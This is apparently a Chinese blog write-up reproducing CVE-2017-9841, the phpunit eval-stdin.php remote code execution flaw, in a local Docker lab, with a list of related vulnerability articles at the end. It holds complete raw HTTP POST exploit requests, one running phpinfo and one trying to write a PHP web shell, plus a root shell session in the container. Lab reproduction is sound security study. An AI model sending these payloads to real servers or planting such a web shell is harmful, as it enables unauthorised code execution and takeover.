CVE-2017-9841 phpunit 远程代码执行漏洞

简介: CVE-2017-9841 phpunit 远程代码执行漏洞

漏洞简介

composer是php包管理工具,使用composer安装扩展包将会在当前目录创建一个vendor文件夹,并将所有文件放在其中。通常这个目录需要放在web目录外,使用户不能直接访问。

phpunit是php中的单元测试工具,其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php文件有如下代码:

eval('?>'.file_get_contents('php://input'));

如果该文件被用户直接访问到,将造成远程代码执行漏洞。

漏洞复现

执行如下命令启动一个php环境,其中phpunit被安装在web目录下。

docker-compose build
docker-compose up -d

web环境将启动在http://127.0.0.1:8080/

虽然显示禁止访问,但通过抓包构造可造成代码执行

POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.phpA HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: hblid=OCkAkPEOWHj8QX5o3m39N0H02BOA0I12; olfsk=olfsk8528760320823083; ECS[visit_times]=1; private_content_version=e48e945c4e066c5afa30b51edd7c4541; pma_lang=en; pma_collation_connection=utf8_unicode_ci
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
<?=phpinfo()?>

直接将PHP代码作为POST Body发送给http://your-ip:8080/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: hblid=OCkAkPEOWHj8QX5o3m39N0H02BOA0I12; olfsk=olfsk8528760320823083; ECS[visit_times]=1; private_content_version=e48e945c4e066c5afa30b51edd7c4541; pma_lang=en; pma_collation_connection=utf8_unicode_ci
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
<?=file_put_contents("2.php", '<?=eval($_REQUEST[1]);?>');

但权限拒绝

进入容器id的命令

(root💀guiltyfet)-[/home/guiltyfet/vulhub/phpunit/CVE-2017-9841]
└─# docker exec -it -u root 7539dda8ee0c /bin/bash                                                                                                                                                  1 ⨯
root@7539dda8ee0c:/var/www/html# ls
composer.json  composer.lock  vendor
root@7539dda8ee0c:/var/www/html# cd vendor
root@7539dda8ee0c:/var/www/html/vendor# cd phpunit/phpunit/src/Util/PHP/
root@7539dda8ee0c:/var/www/html/vendor/phpunit/phpunit/src/Util/PHP# ls
Default.php  Template  Windows.php  eval-stdin.php
root@7539dda8ee0c:/var/www/html/vendor/phpunit/phpunit/src/Util/PHP# cd eval-stdin.php 
bash: cd: eval-stdin.php: Not a directory
root@7539dda8ee0c:/var/www/html/vendor/phpunit/phpunit/src/Util/PHP# ls
Default.php  Template  Windows.php  eval-stdin.php
root@7539dda8ee0c:/var/www/html/vendor/phpunit/phpunit/src/Util/PHP#

关闭

docker-compose down
相关文章
|
SQL 监控 druid
Druid未授权访问 漏洞复现
Druid未授权访问 漏洞复现
17003 0
|
安全 NoSQL API
【漏洞复现】YApi NoSQL注入导致远程命令执行漏洞
YApi是一个API管理工具。在其1.12.0版本之前,存在一处NoSQL注入漏洞,通过该漏洞攻击者可以窃取项目Token,并利用这个Token执行任意Mock脚本,获取服务器权限。
2894 1
|
10月前
|
消息中间件 安全 Java
vulhub部分复现记录(后面大概都是原文档了,也比较难复现就不继续了)
本文介绍了多个软件的安全漏洞及其复现过程,涉及的软件包括Vulhub、Flask、ActiveMQ、Adminer、Airflow、Apache Druid、Apereo CAS、APISIX、AppWeb、Aria2、Bash、Cacti、Celery、CGI、ColdFusion和Confluence。每个部分详细描述了漏洞的背景、环境搭建步骤、漏洞复现的具体操作和验证方法。例如,Flask的SSTI漏洞通过构造特定的模板参数实现命令执行;ActiveMQ的反序列化漏洞利用特制的序列化对象触发;这些示例不仅展示了漏洞的危害性,还提供了实际的复现步骤,帮助读者深入理解这些安全问题。
1727 3
vulhub部分复现记录(后面大概都是原文档了,也比较难复现就不继续了)
|
监控 安全 API
5 款漏洞扫描工具:实用、强力、全面(含开源)(二)
5 款漏洞扫描工具:实用、强力、全面(含开源)
1273 0
5 款漏洞扫描工具:实用、强力、全面(含开源)(二)
|
安全 网络安全 Apache
CVE-2021-41773 复现
CVE-2021-41773 复现
621 1
|
Web App开发 移动开发 安全
WordPress插件wp-file-manager任意文件上传漏洞(CVE-2020-25213)
WordPress插件WPFileManager中存在一个严重的安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程代码执行。
2076 1
|
安全 关系型数据库 网络安全
Taogogo Taocms v3.0.2 远程代码执行(CVE-2022-25578)
Taogogo Taocms v3.0.2 远程代码执行(CVE-2022-25578)
|
Web App开发 JSON 安全
【漏洞复现】Yapi接口管理平台远程代码执行漏洞
Yapi接口管理平台远程代码执行漏洞,攻击者可通过特定Payload对目标实施恶意攻击,获取敏感信息,操控服务器指令。
1471 1
|
安全 Linux 网络安全
【网安神器篇】——WPScan漏洞扫描工具
这是网安神器专栏的第一篇博客,本专栏主要是为了和大家分享平时遇见的冷门但实用的网安工具或项目,希望能帮助到同学们,今天给大家带来的是wordpress渗透神器——wpscan
1407 0
【网安神器篇】——WPScan漏洞扫描工具
|
供应链 安全 IDE
Grafana 未经授权任意访问漏洞(CVE-2022-32275)
Grafana 未经授权任意访问漏洞(CVE-2022-32275)
Grafana 未经授权任意访问漏洞(CVE-2022-32275)